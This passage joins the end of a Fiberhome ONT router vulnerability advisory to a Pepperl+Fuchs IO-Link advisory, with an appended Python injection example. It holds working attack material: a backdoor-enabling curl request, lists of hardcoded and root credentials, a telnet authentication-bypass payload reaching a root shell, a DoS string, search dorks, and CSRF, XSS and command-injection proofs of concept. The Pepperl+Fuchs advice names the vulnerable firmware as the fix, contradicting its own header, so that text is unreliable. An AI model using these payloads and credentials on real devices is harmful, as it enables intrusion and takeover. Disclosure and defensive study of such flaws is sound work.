`br0` is the internal network interface assigned to the LAN.
All the services are binding to both `br0` and `wan0`.

It is trivial to reach services from the WAN (Internet) by contacting
the IPv6 addresses used by `br0` or `wan0`:

- From the WAN:

rasp-wan-olt% telnet [ipv6] 26
Trying [ipv6]...
Connected to [ipv6].
Escape character is '^]'.

(none) login:
telnet> q
Connection closed.

rasp-wan-olt% telnet [ipv6] 80
Trying [ipv6]...
Connected to [ipv6].
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 302 Redirect
Server: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.4.2-OPEN
Date: Mon Jan 7 21:01:29 2020
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
X-Frame-Options: SAMEORIGIN
Location: https://

<html><head></head><body>
This document has moved to a new <a
href="https://">location</a>.
Please update your documents to reflect the new location.
</body></html>

Connection closed by foreign host.
rasp-wan-olt%


By using `ip6tables` on the device, we can confirm the complete lack
of firewall rules for IPv6 connectivity:

#ip6tables -nL
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination
forward_ext_ip all ::/0 ::/0
forward_ext_url all ::/0 ::/0
forward_ext_mac all ::/0 ::/0

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Chain forward_ext_ds_ip (1 references)
target prot opt source destination

Chain forward_ext_ip (1 references)
target prot opt source destination
forward_ext_us_ip all ::/0 ::/0
forward_ext_ds_ip all ::/0 ::/0

Chain forward_ext_mac (1 references)
target prot opt source destination

Chain forward_ext_url (1 references)
target prot opt source destination

Chain forward_ext_us_ip (1 references)
target prot opt source destination
#


I highly recommend disabling IPv6 connectivity.



## Details - HTTP Server - Passwords in HTTP logs

It is possible to find passwords and authentication cookies stored in
clear-text in HTTP logs:

#cat /fhconf/web_log/web.log
web_utils>2020-01-07
19:16:26,../utils/cu_sessionManagement.c[465](findUser): no user named
admin !
<web_custom>2020-01-07
19:16:27,../custom/weblogin.c[595](webLogin):
*************userGroupName = 1
<web_init>2020-01-07
19:16:27,../utils/utils.c[1399](get_admin_default_info): enter
get_admin_default_info
<web_custom>2020-01-07
19:16:27,../custom/weblogin.c[812](webLogin): Warning! Password error!
password = [REMOVED]
<web_utils>2020-01-07
19:27:24,../utils/cu_sessionManagement.c[238](createSession): create
user [REMOVED]



## Details - HTTP Server - Hardcoded SSL certificates

The web management is done over HTTPS, using a hardcoded private key
with 777 permissions:

#ls -la /fhrom/bin/web/certSrv.pem /fhrom/bin/web/privkeySrv.pem
-rwxrwxrwx 1 root 0 883 Apr 1 2019
/fhrom/bin/web/certSrv.pem
-rwxrwxrwx 1 root 0 887 Apr 1 2019
/fhrom/bin/web/privkeySrv.pem
#cat /fhrom/bin/web/privkeySrv.pem
-----BEGIN RSA PRIVATE KEY-----
[REMOVED]
-----END RSA PRIVATE KEY-----
#cat /fhrom/bin/web/certSrv.pem
-----BEGIN CERTIFICATE-----
[REMOVED]
-----END CERTIFICATE-----
#

Another hardcoded private key is also available (?!) in
`/fhrom/bin/web` and can be downloaded over HTTPS:

#ls -la /fhrom/bin/web/privkeySrv.pem
-rwxrwxrwx 1 root 0 887 Apr 1 2019
/fhrom/bin/web/privkeySrv.pem

$ curl -k https://192.168.1.1/privkeySrv.pem
-----BEGIN RSA PRIVATE KEY-----
[REMOVED]
-----END RSA PRIVATE KEY-----



## Details - HTTP server - Pre-auth InfoLeak

It is possible to extract information from the device without
authentication by disabling Javascript and visiting `/info.asp`:

$ curl -k https://192.168.1.1/info.asp
[..]

Software Version: [REMOVED]
[...]
ONU State: [REMOVED]
Regist State: [REMOVED]
LOID: [REMOVED] <----------- Secret used for FTTH connection
[...]
IP Address: [REMOVED]
Subnet Mask: [REMOVED]
IPv6 Address: [REMOVED]
DHCP Clients List: [REMOVED]
Wan IP: [REMOVED]
WAN Mac: [REMOVED] <-------- Used for the telnet backdoor
[...]

Also, it is very easy to guess the MAC address of the `br0` interface
based on the WAN MAC address (e.g.: `wan0`: `xx:xx:xx:xx:xx:x3`, `br0`
will be `xx:xx:xx:xx:xx:x0`).



## Details - HTTP Server - Backdoor allowing telnet access

In order to reach the CLI telnetd, it is also possible to use an
unauthenticated backdoor API provided by the HTTP server. It removes
firewall rules and allows an attacker to reach the telnet server (used
for the CLI).

This backdoor can be found inside the `webs` binary:

- From `sub_C46F8()` (called from main()):

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]


The `backdoor_telnet()` function (named during reverse engineering,
the original name is unknown):

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]


We can reverse the function `omci_set_telnet_uni_state()` from
`libgl3_advance.so`:
[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]


On line 24, rules are added or removed depending on the value of the
argument of this function.


Finally, the `getOnuMac()` function will provide a custom valid entry
from the MAC address of the `br0` interface:

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]


The backdoor is reachable by sending an HTTPS request:

- - https://[ip]/telnet?enable=0&key=calculated(BR0_MAC)

The 'secret' algorithm extracts the ending part of the br0 MAC address.

For the MAC: AA:AA:AA:01:02:03, an attacker can enable the backdoor by sending:

$ curl -k 'https://[ip]/telnet?enable=1&key=010203'

Opening the access to the telnetd:

$ curl -k 'https://192.168.1.1/telnet?enable=1&key=[REMOVED]'
Open telnet success!
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

------acl IP:192.168.1.2 --------
Login:
telnet> q
Connection closed.


Closing the access to the telnetd:

$ curl -k 'https://192.168.1.1/telnet?enable=0&key=[REMOVED]'
$ telnet 192.168.1.1 23
Trying 192.168.1.1...
telnet: connect to address 192.168.1.1: Connection refused
telnet: Unable to connect to remote host


The IPv4 firewall rules before and after triggering the backdoor:

Access is being blocked:

#iptables-save |grep telnet
:input_ext_access_telnet_ani - [0:0]
:input_ext_access_telnet_uni - [0:0]
-A input_ext_access_ctrl -p tcp -m tcp --dport 23 -j
input_ext_access_telnet_uni
-A input_ext_access_ctrl -p tcp -m tcp --dport 23 -j
input_ext_access_telnet_ani
-A input_ext_access_telnet_ani -i tel0 -p tcp -m tcp --dport 23 -j ACCEPT
-A input_ext_access_telnet_ani -i br0 -p tcp -m tcp --dport 23 -j ACCEPT
-A input_ext_access_telnet_ani -p tcp -m tcp --dport 23 -j REJECT
--reject-with tcp-reset
-A input_ext_access_telnet_uni -i br0 -p tcp -m tcp --dport 23 -j
REJECT --reject-with tcp-reset


Access is allowed:

#iptables-save |grep telnet
:input_ext_access_telnet_ani - [0:0]
:input_ext_access_telnet_uni - [0:0]
-A input_ext_access_ctrl -p tcp -m tcp --dport 23 -j
input_ext_access_telnet_uni
-A input_ext_access_ctrl -p tcp -m tcp --dport 23 -j
input_ext_access_telnet_ani
-A input_ext_access_telnet_ani -i tel0 -p tcp -m tcp --dport 23 -j ACCEPT
-A input_ext_access_telnet_ani -i br0 -p tcp -m tcp --dport 23 -j ACCEPT
-A input_ext_access_telnet_ani -p tcp -m tcp --dport 23 -j REJECT
--reject-with tcp-reset



## Details - HTTP Server - Hardcoded credentials

The web daemon contains a list of hardcoded credentials, for different ISPs:

- - user / user1234
- - f~i!b@e#r$h%o^m*esuperadmin / s(f)u_h+g|u
- - admin / lnadmin
- - admin / CUadmin
- - admin / admin
- - telecomadmin / nE7jA%5m
- - adminpldt / z6dUABtl270qRxt7a2uGTiw
- - gestiontelebucaramanga / t3l3buc4r4m4ng42013
- - rootmet / m3tr0r00t
- - awnfibre / fibre@dm!n
- - trueadmin / admintrue
- - admin / G0R2U1P2ag
- - admin / 3UJUh2VemEfUtesEchEC2d2e
- - admin / getOnuMac(s, 6, 32); <- last part of the MAC address of
the `br0` interface
- - admin / 888888
- - L1vt1m4eng / 888888
- - useradmin / 888888
- - user / 888888
- - admin / 1234
- - user / tattoo@home
- - admin / tele1234
- - admin / aisadmin


You can find the incomplete list below:

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]


I really like `m3tr0r00t` :)

There are passwords everywhere in the `webs` binary (HTTP Server).

These credentials, used with `https://ip/fh`, allow opening access to
the CLI telnet on port 23/tcp.



## Details - HTTP Server - TR-069 hardcoded credentials

We can find hardcoded credentials inside the `webs` binary for TR-069:

`telecomadmin`

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]



## Details - HTTP Server - Credentials decryption algorithm

By default, some credentials appear to be encrypted (in the
`/fhconf/umconfig.txt` file).

It is possible to decrypt them using the encryption function found
inside the webs binary. The algorithm is essentially an XOR with the
hardcoded key `*j7a(L#yZ98sSd5HfSgGjMj8;Ss;d)(*&^#@$a2s0i3g`, so the same
routine both encrypts passwords and decrypts "encrypted" ones:

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]


A re-implementation in C is shown below:

#include <stdio.h>
#include <string.h>


int main(int argc,
         char **argv,
         char **envp)
{
    /* Hardcoded key found in the webs binary (and in GoAhead's um.c). */
    char key[45] = "*j7a(L#yZ98sSd5HfSgGjMj8;Ss;d)(*&^#@$a2s0i3g";

    /* "Encrypted" form of s(f)u_h+g|u as stored in /fhconf/umconfig.txt.
       The operation is a plain XOR, so feeding the clear-text string
       (commented out below) prints the encrypted bytes instead. */
    char password[12] = "\x59\x42\x51\x48\x5d\x13\x4b\x52\x3d\x45\x4d\x00";
    //char password[12] = "s(f)u_h+g|u\x00";

    unsigned char encrypted_char;

    for (int i = 0; i < strlen(password); i++)
    {
        /* XOR each byte with the key, cycling through the key buffer. */
        encrypted_char = password[i] ^ key[i % sizeof(key)];

        /* Skip NUL results; the 0x2000 test mirrors the decompiled check
           and can never be true for an unsigned char. */
        if (encrypted_char && !(encrypted_char & 0x2000))
            printf("%c", encrypted_char);
    }

    printf("\n");

    return (0);
}


And it works:

$ cc decrypt-passwords-umconfig.c -o decrypt-passwords-umconfig && ./decrypt-passwords-umconfig | hexdump -C
00000000 73 28 66 29 75 5f 68 2b 67 7c 75 0a |s(f)u_h+g|u.|
0000000c


Interesting fact: we previously found this hardcoded key in FTTH OLTs
from another FTTH vendor:
https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html#weak-encryption-algorithm

It appears this key and this algorithm come from GoAhead:

https://github.com/BruceYang-yeu/goahead-1/blob/master/um.c#L51



## Details - Telnet server (Linux) - Hardcoded credentials

A hardcoded password for root is defined inside
`/etc/init.d/system-config.sh`:

#cat /etc/init.d/system-config.sh
#!/bin/sh

case "$1" in
start)
echo "Configuring system..."
# these are some miscellaneous stuff without a good home
mount -o remount,sync /fhconf
mkdir -p /dev/shm/fhdrv_kdrv_ver_tmp /dev/shm/usr_tmp /fhconf/data
echo "root:W/xa5OyC3jjQU:0:0:root:/:bin/sh"> /etc/passwd
echo "nobody:x:99:99:Nobody:/:/bin/false">> /etc/passwd
ifconfig lo 127.0.0.1 netmask 255.0.0.0 broadcast 127.255.255.255 up
echo > /var/udhcpd/udhcpd.leases
exit 0
;;

# cat /etc/passwd
root:W/xa5OyC3jjQU:0:0:root:/:bin/sh
nobody:x:99:99:Nobody:/:/bin/false


`W/xa5OyC3jjQU` is the traditional DES-based crypt(3) hash of `GEPON`.

This telnet server doesn't run by default but it is possible to start
it from the telnet CLI.



## Details - Telnet server (CLI) - Hardcoded credentials

The CLI telnet on port 23/tcp can also be accessed with these credentials:

- - `gpon`/`gpon`
- - enable: `gpon`


$ nc -v 192.168.1.1 23
Connection to 192.168.1.1 23 port [tcp/telnet] succeeded!

------acl IP:192.168.1.2 --------
Login: gpon
gpon
Password: gpon
User> enable
enable
Password: gpon
****
Config#


We can retrieve these backdoors by reversing the
`libci_adaptation_layer.so` library:

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]


For specific ISPs, there are these valid credentials:
- - `admin` / 4 hexadecimal chars, generated in the
`init_3bb_password()` function located in `libci_adaptation_layer.so`
- - `rdsadmin` / `6GFJdY4aAuUKJjdtSn7d`


You can also test `gepon`/`gepon` (from the firmware extracted in the
other analyzed fiberhome device (AN5506-04-FA, firmware RP2631, 4
April 2019)).



## Details - Telnet server (CLI) - Privilege escalation

The CLI telnet server runs on port 23/tcp and can be reached by (i)
adding firewall rules from the HTTP server using the backdoor API, (ii)
using backdoor credentials on the web interface or (iii) exploiting a
stack overflow in previous HTTP daemons.
It is also reachable by default over IPv6 on the `br0` and `wan0` interfaces.

It is possible to start a Linux telnetd as root on port 26/tcp using
the CLI interface, as shown below:

User> ddd
WRI(DEBUG_H)> shell
Please use port 26 to telnet
WRI(DEBUG_H)> tshell
Please use port 26 to telnet


`shell` and `tshell` call the function `enter_telnet_shell()` from
`libcli_cli.so`, which runs `system("telnet -p 26")`.
This telnetd then accepts the hardcoded credentials described above.

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]


Surprisingly, there is another function called `enter_tshell` (for a
legacy `tshell`) which will run a `system("sh")` as root.

This `enter_tshell()` function providing a root shell is not called from
`shell`, so it looks like dead code:

[please use the HTML version at
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
to see the image]



## Details - Telnet server (CLI) - Authentication bypass

It is possible to bypass telnet authentication by sending a specific
string to the remote telnet server:

$ echo 'GgpoZWxwCmxpc3QKd2hvCg==' | base64 -d > bypass-auth-telnet
$ hexdump -C bypass-auth-telnet
00000000 1a 0a 68 65 6c 70 0a 6c 69 73 74 0a 77 68 6f 0a
|..help.list.who.|
00000010
$ nc 192.168.1.1 23 < bypass-auth-telnet

------acl IP:192.168.1.2 --------
Login:
User>
User> help

This system provides help feature as described below.

1. Anytime you need help, just press "?" and don't
press Enter,you can see each possible command argument
and its description.

2. You can also input "list" and then press Enter
to execute this helpful command to view the list of
commands you can use.

User> list
0. clear
1. enable
2. exit
3. help
4. list
5. ping {[-t]}*1 {[-count] <1-65535>}*1 {[-size] <1-6400>}*1
{[-waittime] <1-255>}*1 {[-ttl] <1-255>}*1 {[-pattern]
<user_pattern>}*1 {[-i] <A.B.C.C>}*1 <A.B.C.D>
6. quit
7. show history
8. show idle-timeout
9. show ip
10. show services
11. show syscontact
12. show syslocation
13. terminal length <0-512>
14. who
15. who am i
User> who
SessionID. - UserName ---------- LOCATION ---------- MODE ----
7 not login 192.168.1.2 not login (That's me.)
Total 1 sessions in current system.
User>



## Details - Telnet server (CLI) - Authentication bypass to start the Linux telnetd

It is possible to use the previous authentication bypass to start a
full telnetd server on port 26 and then get a root shell using the
password from "Telnet server (Linux) - Hardcoded credentials".

By sending `ddd` then `tshell`, a telnetd will be started on port 26/tcp:

$ echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d | nc target 23 &
------acl IP:192.168.1.2 --------
Login:
User>
User> help

This system provides help feature as described below.

1. Anytime you need help, just press "?" and don't
press Enter,you can see each possible command argument
and its description.

2. You can also input "list" and then press Enter
to execute this helpful command to view the list of
commands you can use.

User> list
0. clear
1. enable
2. exit
3. help



$ telnet target 26
Trying target...
Connected to target.
Escape character is '^]'.

(none) login: root
Password: [GEPON]


BusyBox v1.27.2 (2019-04-01 19:16:06 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

#id
uid=0(root) gid=0 groups=0


The attacker will get a root shell.



## Details - Telnet server (CLI) - DoS

It is possible to crash the telnet daemon by sending a specific string:

$ hexdump -C crash-auth-telnet
00000000 1a 0a 65 6e 61 62 6c 65 0a 02 0a 1a 0a |..enable.....|
0000000d
$ nc -v 192.168.1.1 23 < crash-auth-telnet
192.168.1.1: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.1.1] 23 (telnet) open
$ nc -v 192.168.1.1 23 < crash-auth-telnet
192.168.1.1: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.1.1] 23 (telnet) : Connection refused

This segfault exists inside `/fh/extend/load_cli` but was not studied
as the previous bypass already worked.



## Details - System - Credentials stored in clear-text

Some credentials are stored in clear-text with permissive rights:

#pwd
/fhconf/fh_wifi
#ls -la
drwxr-xr-x 2 root 0 536 Jan 7 2020 .
drwxr-xr-x 14 root 0 10264 Jan 8 15:29 ..
-rw-r--r-- 1 root 0 118 Jan 1 1970 wifi_custom.cfg
-rw-r--r-- 1 root 0 1212 Jan 7 2020 wifictl_2g.cfg
-rw-r--r-- 1 root 0 1178 Jan 7 2020 wifictl_2g.cfg.bak
-rw-r--r-- 1 root 0 1213 Jan 7 2020 wifictl_5g.cfg
-rw-r--r-- 1 root 0 1208 Jan 7 2020 wifictl_5g.cfg.bak

#cat /fhconf/fh_wifi/wifi_custom.cfg
ssid_2g=[REMOVED]
ssid_5g=[REMOVED]
country=BR
auth=WPAPSKWPA2PSK
encrypt=tkipaes
psk=[REMOVED]
#

#cat wifictl_2g.cfg
[...]
WPAPSK=[REMOVED]
[...]
WEPKey1=[REMOVED]
[...]
WEPKey2=[REMOVED]
[...]
WEPKey3=[REMOVED]
[...]
WEPKey4=[REMOVED]
[...]
RadiusKey=[REMOVED]

#cat wifictl_5g.cfg
SSID=[REMOVED]
[...]
WPAPSK=[REMOVED]
[...]
WEPKey1=[REMOVED]
[...]
WEPKey2=[REMOVED]
[...]
WEPKey3=[REMOVED]
[...]
WEPKey4=[REMOVED]
[...]
RadiusKey=[REMOVED]



## Details - Misc - Passwords stored in clear-text in nvram

Some passwords are stored in clear-text in nvram:

#nvram show
wl0.1_key=1
wl0.1_key1=[REMOVED]
wl0.1_key2=[REMOVED]
wl0.1_key3=[REMOVED]
wl0.1_key4=[REMOVED]
[...]
wl0.1_ssid=[REMOVED]
[...]
wl0.1_wpa_psk=[REMOVED]
[...]
wl0_key1=[REMOVED]
wl0_key2=[REMOVED]
wl0_key3=[REMOVED]
wl0_key4=[REMOVED]
[...]
wl0_ssid=[REMOVED]
[...]
wl0_wpa_psk=[REMOVED]
[...]
[ passwords everywhere removed because of space ]
[...]



## Details - Misc - Remote stack overflow in the HTTP server (AN5506-04-FA / RP2631)

I got another Fiberhome device with a different firmware version
(AN5506-04-FA, firmware RP2631, 4 April 2019). The HG6245D and the
AN5506-04-FA devices share a very similar code base.

The firmware on the AN5506-04-FA device is vulnerable to a remote
stack overflow in the `webs` process by sending a Cookie value with a
length > 511 bytes to any valid asp webpage. This can be triggered
using a simple wget command:

$ wget --no-check-certificate -O- --header 'Cookie: loginName=AAAA[511bytes]AAAA' https://192.168.1.1/tr069/tr069.asp


In the HG6245D firmware version RP2602, this vulnerability has been
patched by checking the size of values in the cookies, so I was not
able to exploit it. You can also read the log file to confirm the
length is now checked:


<web_ga>2020-01-08 21:23:12,../thd_ga2_5/webs.c[1375](websParseRequest): Request header param value is too long! key: cookie

It appears it has been patched in the HG6245D router, firmware RP2602.
Firmware RP2631 (4 April 2019) for router AN5506-04-FA remains
vulnerable.
I found no CVE or public research about this vulnerability so it may
have been silently patched by the vendor for the HG6245D router.



## Dorks

"acl IP:"
"GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.4.2-OPEN"



## Vendor Response

Full-disclosure is applied as it is believed that some backdoors have
been intentionally placed by the vendor.



## Report Timeline

* Jan 7, 2020: Majority of vulnerabilities found.
* Jan 8, 2020: This advisory was written.
* Aug 2020: Found the lack of IPv6 firewall.
* Jan 9, 2021: Vulnerabilities checked again and the advisory was rewritten.
* Jan 12, 2021: A public advisory is sent to security mailing lists.



## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2021-fiberhome-0x00-ont.txt

https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/


--
Pierre Kim
pierre.kim.sec@gmail.com
@PierreKimSec
https://pierrekim.github.io/



Pepperl+Fuchs IO-Link Master Series 1.36 CSRF / XSS / Command Injection


Pepperl+Fuchs IO-Link Master Series with system version 1.36 and application version 1.5.28 suffers from command injection, cross site request forgery, cross site scripting, denial of service, and null pointer vulnerabilities.


MD5 | aa2d5c40642dad8f8d6fe9a2f9666788

SEC Consult Vulnerability Lab Security Advisory < 20210113-0 >
=======================================================================
title: Multiple vulnerabilities
product: Pepperl+Fuchs IO-Link Master Series
See "Vulnerable / tested versions"
vulnerable version: System 1.36 / Application 1.5.28
fixed version: System 1.52 / Application 1.6.11
CVE number: CVE-2020-12511, CVE-2020-12512, CVE-2020-12513,
CVE-2020-12514
impact: High
homepage: https://www.pepperl-fuchs.com
found: 2020-04-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult, an Atos company
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Automation is our world. Perfect application solutions are our goal.

In 1945, Walter Pepperl and Ludwig Fuchs founded a small radio workshop in
Mannheim, Germany, based on the principles of inventiveness, entrepreneurial
foresight, and self-reliance. The experience they acquired was transformed into
new ideas, and they continued to enjoy developing products for customers. The
eventual result was the invention of the proximity switch. This innovation
represented the starting point of the company's success story.

Today, Pepperl+Fuchs is known by customers around the world as a pioneer and an
innovator in electrical explosion protection and sensor technology. Our main
focus is always on your individual requirements: With a passion for automation
and groundbreaking technology, we are committed to working in partnership with
you now and in the future. We understand the demands of your markets,
developing specific solutions, and integrating them into your processes."

Source: https://www.pepperl-fuchs.com/usa/en/25.htm


Business recommendation:
------------------------
SEC Consult recommends updating the devices to the newest firmware packages
(System 1.36 / Application 1.5.28), where the documented issues are fixed
according to the vendor.


Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)
The web interface that is used to set all configurations is vulnerable to
cross-site request forgery attacks. An attacker can change settings this way
by luring the victim to a malicious website.

2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512)
An authenticated reflected cross-site scripting vulnerability can be triggered
by issuing a POST request to the "/Software" endpoint of the web service. An
attacker can abuse this vulnerability to steal cookies from the attacked user
in order to log on to the device, and to perform actions in the context of
the attacked user.

3) Authenticated Blind Command Injection (CVE-2020-12513)
A command injection was identified in the web-interface. This vulnerability is
present because of unfiltered user input that is appended to a string which
gets executed with "exec()". Commands are executed as root user.

4) Null Pointer Dereference / DoS in "discoveryd" (CVE-2020-12514)
The discovery daemon ("discoveryd") is started during the bootup of the device.
The program is used by the network management program "PortVision DX". It is
implemented with unsafe functions and is vulnerable to a DoS attack, triggered
by a null pointer dereference in strlen. A debug mode is also available in the
program and is activated by starting the daemon with "discoveryd -vv"; all
inputs are then printed to stdout during execution. This mode is not enabled
on the production device but could lead to more severe attacks.

5) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination.

One of the discovered vulnerabilities (CVE-2017-16544) was verified by using
the MEDUSA scalable firmware runtime.


Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-12511)
The following PoC can be used to change the hostname of the device to "SEC-Consult":
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://$IP/configuration_tab/ajax_comb_table_save/network_config/network_config_schema" method="POST">
<input type="hidden" name="form"
value="Hostname=SEC-Consult&IPv4mode=static&IPv4address=1.101&IPv4netmask=255.255.255.0&IPv4gateway=1.1.12&DNSmode=manual&IPv4DNS1=&IPv4DNS2=&IpAddrCnflctDetectEnbl=enable&NtpServer=&SyslogServer=&SyslogPort=514&SshServerEnable=disable"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------

2) Authenticated Reflected POST Cross-Site Scripting (CVE-2020-12512)
By sending the following request to the web-service, a reflected cross-site
scripting vulnerability can be triggered:
-------------------------------------------------------------------------------
POST /Software HTTP/1.1
Host: $IP
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: ui_language=en_US; PHPSESSID=r7jtaceerqeijqr4b2dl0us814
Upgrade-Insecure-Requests: 1

language=german'><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
The server responds with the following content:
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Content-Length: 11860
Connection: close
Date: Thu, 01 Jan 1970 00:59:46 GMT
Server: lighttpd/1.4.41

[...]

<div class="page-content">
<div class="page-header">
<h1>Software <a href='/assets/WebHelp/german'><script>alert(document.cookie)</script>/advanced/software.htm' target='_blank'><img src='/assets/images/question_16.png' alt='Page-specific Help'></a></h1>
<a class="latest-version" href="#">Check for latest version</a>
</div>

[...]
-------------------------------------------------------------------------------

PoC-Exploit code for the cross-site scripting vulnerability:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/Software" method="POST">
<input type="hidden" name="language" value="german'><script>alert(document.cookie)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------

3) Authenticated Blind Command Injection (CVE-2020-12513)
By entering a command in the field "code" under the tab "IO-Link Test Event
Generation" on the endpoint "/Misc/Settings" that is surrounded by ";", it
gets executed. The following POST request to the web-service demonstrates this
with the command "ping 127.0.0.1":
-------------------------------------------------------------------------------
POST /index.php/ajax/generate_iolink_event/ HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://$IP/Misc/Settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Connection: close
Cookie: ui_language=en_US; PHPSESSID=lh8d4g4e8fm9f1732j9g6bm3a0

mode=single&type=message&instance=unknown&source=local&pdivalid=valid&code=0x0000%3Bping+127.0.0.1%3B
-------------------------------------------------------------------------------

There is no response from the web service, which indicates to the attacker that
the command was executed. As this was tested on an emulated device only, the
commands were observed in the process list, which proved that they were
executed as root:

-bash-4.4# ps
PID USER COMMAND
[...]
216 root /usr/sbin/restoremonitor
272 root /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid
333 root /apps/bin/appmgr
347 root 05discoverd
349 root 11iolinkconfigd
353 root 90netconfig-saved
354 root 90netconfig-working
385 root lighttpd -f /apps/www/lighttpd.conf
386 root /usr/bin/php-cgi
387 root /usr/bin/php-cgi
388 root /usr/bin/php-cgi
389 root /usr/bin/php-cgi
390 root /usr/bin/php-cgi
391 root /usr/bin/php-cgi
392 root config waitcmd working network /apps/bin/updateLighttpdAuth
395 root /usr/bin/php-cgi
397 root -bash
399 root /usr/bin/php-cgi
473 root udhcpc -R -n -O search -p /var/run/udhcpc.eth0.pid -i eth0 -x ho
2519 root [kworker/u3:2]
3173 root sh -c injectEvent -m single -t message -i unknown -s local -v va
3175 root ping 127.0.0.1
3509 root 50ethernetip
3541 root [10iolinkd]
3544 root ps
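Added example, not Pepperl+Fuchs code: it shows why the `code` value above makes `/bin/sh` run a second command, and how the call should be built so that it cannot. The fixed injectEvent arguments are taken from the ps output; the option name carrying the event code (`-c`), the completion of `-v va` to `-v valid` (from `pdivalid=valid`) and the `0xNNNN` code format are assumptions.

```python
"""Command injection via a shell-built command line, and the argv-list fix."""
import re
import shlex

# The 'code' field value from the request above, URL-decoded.
INJECTED_CODE = "0x0000;ping 127.0.0.1;"
# Assumed format of a legitimate IO-Link event code: 0x plus four hex digits.
EVENT_CODE = re.compile(r"0x[0-9A-Fa-f]{4}")
# Fixed arguments as seen in the 'sh -c injectEvent ...' process list entry;
# '-v valid' is completed from the pdivalid=valid form field (assumption).
FIXED_ARGS = ["-m", "single", "-t", "message", "-i", "unknown",
              "-s", "local", "-v", "valid"]


def vulnerable_command_line(code):
    """The flawed pattern from the advisory: the untrusted value is glued onto
    a command string that is later handed to exec(), i.e. parsed by /bin/sh.
    The '-c' option name is an assumption."""
    return "injectEvent " + " ".join(FIXED_ARGS) + " -c " + code


def shell_commands(command_line):
    """Split a command line the way /bin/sh does on ';' outside quotes and
    return one argv list per command the shell would execute."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=";")
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
                current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def is_valid_code(code):
    """Allowlist check: anything that is not exactly 0xNNNN is rejected,
    so ';', quotes and whitespace never reach the command at all."""
    return EVENT_CODE.fullmatch(code) is not None


def safe_argv(code):
    """Validate first, then build an argv list (subprocess.run(argv) without
    shell=True): no shell parses the value, so even a ';' would arrive at
    injectEvent inside one literal argument instead of starting a command."""
    if not is_valid_code(code):
        raise ValueError("event code must look like 0x1234, got %r" % code)
    return ["injectEvent", *FIXED_ARGS, "-c", code]


if __name__ == "__main__":
    print("shell would run:", shell_commands(vulnerable_command_line(INJECTED_CODE)))
    print("payload accepted:", is_valid_code(INJECTED_CODE))
    print("argv for a valid code:", safe_argv("0x0000"))
```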


